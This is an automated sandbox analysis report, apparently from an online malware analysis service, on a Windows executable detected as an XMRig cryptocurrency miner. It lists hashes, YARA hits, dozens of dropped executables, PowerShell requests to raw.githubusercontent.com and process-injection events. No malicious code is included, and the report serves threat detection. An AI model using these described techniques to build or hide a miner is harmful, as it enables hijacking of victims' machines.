xmrig | 2e51a94b481d20b8f3d10a748b7edffb571284814c985e93b175d4f281fda82f

Analysis

max time kernel
93s
max time network
122s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
11-05-2024 10:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
Size

2.1MB
MD5

3409b82fed8de7359456f2f29a5bac03
SHA1

e5acac01d12609718b26298fc3a4799f6a294ee1
SHA256

2e51a94b481d20b8f3d10a748b7edffb571284814c985e93b175d4f281fda82f
SHA512

2db3f9ee56925ae781db24e4f42271b15d574bb512b7aac4607d2f2a15ff7cb02024fb19674128428f30e1d16a15df70af6c5cf58803f3db92657649f0387cf9
SSDEEP

49152:Lz071uv4BPMkibTIA5lCx7kvRWa4pXHafMh:NABp

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 45 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/3764-192-0x00007FF634220000-0x00007FF634612000-memory.dmp	xmrig
behavioral2/memory/3160-266-0x00007FF748820000-0x00007FF748C12000-memory.dmp	xmrig
behavioral2/memory/3576-271-0x00007FF764E90000-0x00007FF765282000-memory.dmp	xmrig
behavioral2/memory/4392-301-0x00007FF62E520000-0x00007FF62E912000-memory.dmp	xmrig
behavioral2/memory/1460-309-0x00007FF6DCF80000-0x00007FF6DD372000-memory.dmp	xmrig
behavioral2/memory/4944-308-0x00007FF79A940000-0x00007FF79AD32000-memory.dmp	xmrig
behavioral2/memory/1628-307-0x00007FF76B2C0000-0x00007FF76B6B2000-memory.dmp	xmrig
behavioral2/memory/32-306-0x00007FF7EB550000-0x00007FF7EB942000-memory.dmp	xmrig
behavioral2/memory/1556-305-0x00007FF768630000-0x00007FF768A22000-memory.dmp	xmrig
behavioral2/memory/4240-303-0x00007FF7FAFA0000-0x00007FF7FB392000-memory.dmp	xmrig
behavioral2/memory/4640-302-0x00007FF6C2940000-0x00007FF6C2D32000-memory.dmp	xmrig
behavioral2/memory/3388-300-0x00007FF73E180000-0x00007FF73E572000-memory.dmp	xmrig
behavioral2/memory/4124-299-0x00007FF7B1430000-0x00007FF7B1822000-memory.dmp	xmrig
behavioral2/memory/2952-296-0x00007FF6DC300000-0x00007FF6DC6F2000-memory.dmp	xmrig
behavioral2/memory/1324-265-0x00007FF7F2120000-0x00007FF7F2512000-memory.dmp	xmrig
behavioral2/memory/3728-171-0x00007FF755F50000-0x00007FF756342000-memory.dmp	xmrig
behavioral2/memory/572-157-0x00007FF7F7CA0000-0x00007FF7F8092000-memory.dmp	xmrig
behavioral2/memory/1132-129-0x00007FF7E0D00000-0x00007FF7E10F2000-memory.dmp	xmrig
behavioral2/memory/4152-107-0x00007FF7044E0000-0x00007FF7048D2000-memory.dmp	xmrig
behavioral2/memory/2964-86-0x00007FF705890000-0x00007FF705C82000-memory.dmp	xmrig
behavioral2/memory/224-37-0x00007FF6B0110000-0x00007FF6B0502000-memory.dmp	xmrig
behavioral2/memory/224-2800-0x00007FF6B0110000-0x00007FF6B0502000-memory.dmp	xmrig
behavioral2/memory/4240-2803-0x00007FF7FAFA0000-0x00007FF7FB392000-memory.dmp	xmrig
behavioral2/memory/1556-2804-0x00007FF768630000-0x00007FF768A22000-memory.dmp	xmrig
behavioral2/memory/3092-2806-0x00007FF62E470000-0x00007FF62E862000-memory.dmp	xmrig
behavioral2/memory/32-2808-0x00007FF7EB550000-0x00007FF7EB942000-memory.dmp	xmrig
behavioral2/memory/3728-2818-0x00007FF755F50000-0x00007FF756342000-memory.dmp	xmrig
behavioral2/memory/572-2822-0x00007FF7F7CA0000-0x00007FF7F8092000-memory.dmp	xmrig
behavioral2/memory/1628-2824-0x00007FF76B2C0000-0x00007FF76B6B2000-memory.dmp	xmrig
behavioral2/memory/3468-2820-0x00007FF6D2210000-0x00007FF6D2602000-memory.dmp	xmrig
behavioral2/memory/4152-2816-0x00007FF7044E0000-0x00007FF7048D2000-memory.dmp	xmrig
behavioral2/memory/2964-2812-0x00007FF705890000-0x00007FF705C82000-memory.dmp	xmrig
behavioral2/memory/1132-2811-0x00007FF7E0D00000-0x00007FF7E10F2000-memory.dmp	xmrig
behavioral2/memory/2732-2814-0x00007FF76A1A0000-0x00007FF76A592000-memory.dmp	xmrig
behavioral2/memory/4944-2835-0x00007FF79A940000-0x00007FF79AD32000-memory.dmp	xmrig
behavioral2/memory/3576-2831-0x00007FF764E90000-0x00007FF765282000-memory.dmp	xmrig
behavioral2/memory/3388-2849-0x00007FF73E180000-0x00007FF73E572000-memory.dmp	xmrig
behavioral2/memory/4640-2863-0x00007FF6C2940000-0x00007FF6C2D32000-memory.dmp	xmrig
behavioral2/memory/3160-2864-0x00007FF748820000-0x00007FF748C12000-memory.dmp	xmrig
behavioral2/memory/4124-2848-0x00007FF7B1430000-0x00007FF7B1822000-memory.dmp	xmrig
behavioral2/memory/1460-2846-0x00007FF6DCF80000-0x00007FF6DD372000-memory.dmp	xmrig
behavioral2/memory/4392-2843-0x00007FF62E520000-0x00007FF62E912000-memory.dmp	xmrig
behavioral2/memory/1324-2837-0x00007FF7F2120000-0x00007FF7F2512000-memory.dmp	xmrig
behavioral2/memory/2952-2833-0x00007FF6DC300000-0x00007FF6DC6F2000-memory.dmp	xmrig
behavioral2/memory/3764-2840-0x00007FF634220000-0x00007FF634612000-memory.dmp	xmrig

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow pid process

3 232 powershell.exe
5 232 powershell.exe
7 232 powershell.exe
8 232 powershell.exe
10 232 powershell.exe
11 232 powershell.exe
13 232 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

232 powershell.exe

flow	pid	process
3	232	powershell.exe
5	232	powershell.exe
7	232	powershell.exe
8	232	powershell.exe
10	232	powershell.exe
11	232	powershell.exe
13	232	powershell.exe

pid	process
232	powershell.exe

Executes dropped EXE 64 IoCs

Processes:

cxJrRPI.exeUJnHGhf.exehahDtEj.exeBvSqqZk.exeriMfklg.exeposPyKH.exehpfOWkw.exeNGzisjZ.exeLYXpYnA.exeprAMqwi.exediuokxk.exeVsGhbdE.exepiHriuc.exexYYcJrg.exerArXEMT.exeQUzJtvk.exeyMEGMQk.exekNxabxC.exesqVakCy.exeQpigQTq.exeLPaMcmD.exeWiufyRA.exevvaMkhS.exetpmFhJW.exeEJmSAqW.exeqVbDfzR.exetKIaQhN.exewhhydKp.exepoRyFNu.exeCUKSDdj.exeIdKIUYS.exegFoBVEf.exenMaGzfu.exeFCrIOsA.exeBCQLfIm.exeBJWnuMl.exenYImdRn.exeZTtcjXO.exeWIGJucq.exebJbpDLw.exePkvrsow.exePycPqJo.exeCWCCbkT.exeZLhBEYa.exeQfOJODx.exejHygAKi.exeMUCFoKr.exewLwhbgr.exewRLQoDj.exeQUzYNUK.exeNZVLAYQ.exeakTAABJ.exeqAGBqWp.exeBezLPIn.exennuUYZo.exeqAxenaz.exeKYiaqlX.exebEHPdcr.exeEHyOajO.exeMyvGoQq.exeRwsVesf.exeLeuvPbZ.execSiJgwd.exeDqoQMPR.exe

pid	process
3092	cxJrRPI.exe
224	UJnHGhf.exe
4240	hahDtEj.exe
1556	BvSqqZk.exe
2732	riMfklg.exe
3468	posPyKH.exe
2964	hpfOWkw.exe
32	NGzisjZ.exe
4152	LYXpYnA.exe
1132	prAMqwi.exe
572	diuokxk.exe
3728	VsGhbdE.exe
1628	piHriuc.exe
4944	xYYcJrg.exe
3764	rArXEMT.exe
1324	QUzJtvk.exe
3160	yMEGMQk.exe
3576	kNxabxC.exe
2952	sqVakCy.exe
4124	QpigQTq.exe
3388	LPaMcmD.exe
4392	WiufyRA.exe
1460	vvaMkhS.exe
4640	tpmFhJW.exe
4744	EJmSAqW.exe
1172	qVbDfzR.exe
3612	tKIaQhN.exe
1116	whhydKp.exe
4352	poRyFNu.exe
3684	CUKSDdj.exe
388	IdKIUYS.exe
1776	gFoBVEf.exe
812	nMaGzfu.exe
3864	FCrIOsA.exe
3400	BCQLfIm.exe
4276	BJWnuMl.exe
4504	nYImdRn.exe
3136	ZTtcjXO.exe
4972	WIGJucq.exe
3568	bJbpDLw.exe
1928	Pkvrsow.exe
2948	PycPqJo.exe
3128	CWCCbkT.exe
4564	ZLhBEYa.exe
3960	QfOJODx.exe
844	jHygAKi.exe
960	MUCFoKr.exe
2484	wLwhbgr.exe
916	wRLQoDj.exe
536	QUzYNUK.exe
1856	NZVLAYQ.exe
3200	akTAABJ.exe
1076	qAGBqWp.exe
456	BezLPIn.exe
3852	nnuUYZo.exe
5012	qAxenaz.exe
2884	KYiaqlX.exe
3212	bEHPdcr.exe
704	EHyOajO.exe
1760	MyvGoQq.exe
4556	RwsVesf.exe
2116	LeuvPbZ.exe
2668	cSiJgwd.exe
60	DqoQMPR.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/4584-0-0x00007FF610580000-0x00007FF610972000-memory.dmp	upx
C:\Windows\System\UJnHGhf.exe	upx
C:\Windows\System\cxJrRPI.exe	upx
C:\Windows\System\hpfOWkw.exe	upx
C:\Windows\System\VsGhbdE.exe	upx
C:\Windows\System\QpigQTq.exe	upx
C:\Windows\System\sqVakCy.exe	upx
C:\Windows\System\LPaMcmD.exe	upx
C:\Windows\System\nMaGzfu.exe	upx
behavioral2/memory/3764-192-0x00007FF634220000-0x00007FF634612000-memory.dmp	upx
behavioral2/memory/3160-266-0x00007FF748820000-0x00007FF748C12000-memory.dmp	upx
behavioral2/memory/3576-271-0x00007FF764E90000-0x00007FF765282000-memory.dmp	upx
behavioral2/memory/4392-301-0x00007FF62E520000-0x00007FF62E912000-memory.dmp	upx
behavioral2/memory/1460-309-0x00007FF6DCF80000-0x00007FF6DD372000-memory.dmp	upx
behavioral2/memory/4944-308-0x00007FF79A940000-0x00007FF79AD32000-memory.dmp	upx
behavioral2/memory/1628-307-0x00007FF76B2C0000-0x00007FF76B6B2000-memory.dmp	upx
behavioral2/memory/32-306-0x00007FF7EB550000-0x00007FF7EB942000-memory.dmp	upx
behavioral2/memory/1556-305-0x00007FF768630000-0x00007FF768A22000-memory.dmp	upx
behavioral2/memory/4240-303-0x00007FF7FAFA0000-0x00007FF7FB392000-memory.dmp	upx
behavioral2/memory/4640-302-0x00007FF6C2940000-0x00007FF6C2D32000-memory.dmp	upx
behavioral2/memory/3388-300-0x00007FF73E180000-0x00007FF73E572000-memory.dmp	upx
behavioral2/memory/4124-299-0x00007FF7B1430000-0x00007FF7B1822000-memory.dmp	upx
behavioral2/memory/2952-296-0x00007FF6DC300000-0x00007FF6DC6F2000-memory.dmp	upx
behavioral2/memory/1324-265-0x00007FF7F2120000-0x00007FF7F2512000-memory.dmp	upx
C:\Windows\System\BCQLfIm.exe	upx
C:\Windows\System\qVbDfzR.exe	upx
behavioral2/memory/3728-171-0x00007FF755F50000-0x00007FF756342000-memory.dmp	upx
C:\Windows\System\whhydKp.exe	upx
C:\Windows\System\tpmFhJW.exe	upx
C:\Windows\System\yMEGMQk.exe	upx
C:\Windows\System\vvaMkhS.exe	upx
behavioral2/memory/572-157-0x00007FF7F7CA0000-0x00007FF7F8092000-memory.dmp	upx
C:\Windows\System\gFoBVEf.exe	upx
C:\Windows\System\IdKIUYS.exe	upx
C:\Windows\System\WiufyRA.exe	upx
C:\Windows\System\CUKSDdj.exe	upx
C:\Windows\System\poRyFNu.exe	upx
C:\Windows\System\FCrIOsA.exe	upx
C:\Windows\System\tKIaQhN.exe	upx
C:\Windows\System\QUzJtvk.exe	upx
behavioral2/memory/1132-129-0x00007FF7E0D00000-0x00007FF7E10F2000-memory.dmp	upx
C:\Windows\System\xYYcJrg.exe	upx
C:\Windows\System\EJmSAqW.exe	upx
C:\Windows\System\kNxabxC.exe	upx
C:\Windows\System\rArXEMT.exe	upx
behavioral2/memory/4152-107-0x00007FF7044E0000-0x00007FF7048D2000-memory.dmp	upx
C:\Windows\System\piHriuc.exe	upx
behavioral2/memory/2964-86-0x00007FF705890000-0x00007FF705C82000-memory.dmp	upx
C:\Windows\System\diuokxk.exe	upx
C:\Windows\System\LYXpYnA.exe	upx
C:\Windows\System\riMfklg.exe	upx
C:\Windows\System\prAMqwi.exe	upx
behavioral2/memory/3468-54-0x00007FF6D2210000-0x00007FF6D2602000-memory.dmp	upx
C:\Windows\System\posPyKH.exe	upx
behavioral2/memory/2732-48-0x00007FF76A1A0000-0x00007FF76A592000-memory.dmp	upx
C:\Windows\System\NGzisjZ.exe	upx
behavioral2/memory/224-37-0x00007FF6B0110000-0x00007FF6B0502000-memory.dmp	upx
C:\Windows\System\BvSqqZk.exe	upx
behavioral2/memory/3092-21-0x00007FF62E470000-0x00007FF62E862000-memory.dmp	upx
C:\Windows\System\hahDtEj.exe	upx
behavioral2/memory/224-2800-0x00007FF6B0110000-0x00007FF6B0502000-memory.dmp	upx
behavioral2/memory/4240-2803-0x00007FF7FAFA0000-0x00007FF7FB392000-memory.dmp	upx
behavioral2/memory/1556-2804-0x00007FF768630000-0x00007FF768A22000-memory.dmp	upx
behavioral2/memory/3092-2806-0x00007FF62E470000-0x00007FF62E862000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

2 raw.githubusercontent.com
3 raw.githubusercontent.com

flow	ioc
2	raw.githubusercontent.com
3	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

Processes:

3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe

description	ioc	process
File created	C:\Windows\System\poRyFNu.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\wpMQrtb.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\blEnWym.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\CUTqqMK.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\gWOrKTB.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\GIPEIbR.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\dZeEkSg.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\gUXnqYc.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\nKRHuqh.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\TZTHrei.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\wnwulNc.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\FZGvemh.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\kdXVCAT.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\jqPdRHt.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\kAnxtaW.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\KUnvBhA.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\jxZNmwf.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\xwmtbbA.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\CYUQefy.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\HrqBbML.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\DsvrjzC.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\lenvcAs.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\ssoURiU.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\FycIzlW.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\oNeuyER.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\jtTlLgm.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\HTAvTRx.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\qHQPQTW.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\SfWYdOB.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\QLqCtgC.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\JRUwQYX.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\prAMqwi.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\WTRfoTA.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\qZxuewY.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\AEJKTGr.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\QFxkHeI.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\sOlrbFE.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\GOGUsFv.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\zAqimPw.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\LCPDwjV.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\PWZaiFy.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\tXzggaR.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\kAGzQNa.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\RhPCoYK.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\NvlCuxR.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\luKgouM.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\yskElmz.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\WGFrwfB.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\fNbJIRz.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\WrBBGYO.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\FAAElxg.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\nQaVIDj.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\TQGNZlx.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\VyQmVLL.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\yShrilo.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\MhhpVqW.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\WBdGYFR.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\TAiqULI.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\vUACEKO.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\piHriuc.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\ByFkJGT.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\eFRZHRE.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\mRDVTGh.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
File created	C:\Windows\System\WXBBcdz.exe	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

232 powershell.exe
232 powershell.exe
232 powershell.exe

pid	process
232	powershell.exe
232	powershell.exe
232	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exe3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe

description	pid	process
Token: SeDebugPrivilege	232	powershell.exe
Token: SeLockMemoryPrivilege	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
Token: SeLockMemoryPrivilege	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe

description	pid	process	target process
PID 4584 wrote to memory of 232	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	powershell.exe
PID 4584 wrote to memory of 232	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	powershell.exe
PID 4584 wrote to memory of 224	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	UJnHGhf.exe
PID 4584 wrote to memory of 224	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	UJnHGhf.exe
PID 4584 wrote to memory of 3092	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	cxJrRPI.exe
PID 4584 wrote to memory of 3092	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	cxJrRPI.exe
PID 4584 wrote to memory of 4240	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	hahDtEj.exe
PID 4584 wrote to memory of 4240	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	hahDtEj.exe
PID 4584 wrote to memory of 1556	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	BvSqqZk.exe
PID 4584 wrote to memory of 1556	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	BvSqqZk.exe
PID 4584 wrote to memory of 2732	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	riMfklg.exe
PID 4584 wrote to memory of 2732	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	riMfklg.exe
PID 4584 wrote to memory of 3468	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	posPyKH.exe
PID 4584 wrote to memory of 3468	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	posPyKH.exe
PID 4584 wrote to memory of 2964	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	hpfOWkw.exe
PID 4584 wrote to memory of 2964	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	hpfOWkw.exe
PID 4584 wrote to memory of 1132	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	prAMqwi.exe
PID 4584 wrote to memory of 1132	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	prAMqwi.exe
PID 4584 wrote to memory of 32	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	NGzisjZ.exe
PID 4584 wrote to memory of 32	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	NGzisjZ.exe
PID 4584 wrote to memory of 4152	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	LYXpYnA.exe
PID 4584 wrote to memory of 4152	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	LYXpYnA.exe
PID 4584 wrote to memory of 572	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	diuokxk.exe
PID 4584 wrote to memory of 572	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	diuokxk.exe
PID 4584 wrote to memory of 3728	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	VsGhbdE.exe
PID 4584 wrote to memory of 3728	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	VsGhbdE.exe
PID 4584 wrote to memory of 1628	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	piHriuc.exe
PID 4584 wrote to memory of 1628	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	piHriuc.exe
PID 4584 wrote to memory of 4944	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	xYYcJrg.exe
PID 4584 wrote to memory of 4944	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	xYYcJrg.exe
PID 4584 wrote to memory of 3764	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	rArXEMT.exe
PID 4584 wrote to memory of 3764	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	rArXEMT.exe
PID 4584 wrote to memory of 1324	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	QUzJtvk.exe
PID 4584 wrote to memory of 1324	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	QUzJtvk.exe
PID 4584 wrote to memory of 3160	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	yMEGMQk.exe
PID 4584 wrote to memory of 3160	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	yMEGMQk.exe
PID 4584 wrote to memory of 3576	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	kNxabxC.exe
PID 4584 wrote to memory of 3576	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	kNxabxC.exe
PID 4584 wrote to memory of 2952	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	sqVakCy.exe
PID 4584 wrote to memory of 2952	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	sqVakCy.exe
PID 4584 wrote to memory of 4124	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	QpigQTq.exe
PID 4584 wrote to memory of 4124	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	QpigQTq.exe
PID 4584 wrote to memory of 3388	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	LPaMcmD.exe
PID 4584 wrote to memory of 3388	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	LPaMcmD.exe
PID 4584 wrote to memory of 4392	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	WiufyRA.exe
PID 4584 wrote to memory of 4392	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	WiufyRA.exe
PID 4584 wrote to memory of 1460	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	vvaMkhS.exe
PID 4584 wrote to memory of 1460	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	vvaMkhS.exe
PID 4584 wrote to memory of 4640	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	tpmFhJW.exe
PID 4584 wrote to memory of 4640	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	tpmFhJW.exe
PID 4584 wrote to memory of 4744	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	EJmSAqW.exe
PID 4584 wrote to memory of 4744	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	EJmSAqW.exe
PID 4584 wrote to memory of 1172	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	qVbDfzR.exe
PID 4584 wrote to memory of 1172	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	qVbDfzR.exe
PID 4584 wrote to memory of 3612	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	tKIaQhN.exe
PID 4584 wrote to memory of 3612	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	tKIaQhN.exe
PID 4584 wrote to memory of 1116	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	whhydKp.exe
PID 4584 wrote to memory of 1116	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	whhydKp.exe
PID 4584 wrote to memory of 4352	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	poRyFNu.exe
PID 4584 wrote to memory of 4352	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	poRyFNu.exe
PID 4584 wrote to memory of 3684	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	CUKSDdj.exe
PID 4584 wrote to memory of 3684	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	CUKSDdj.exe
PID 4584 wrote to memory of 388	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	IdKIUYS.exe
PID 4584 wrote to memory of 388	4584	3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe	IdKIUYS.exe

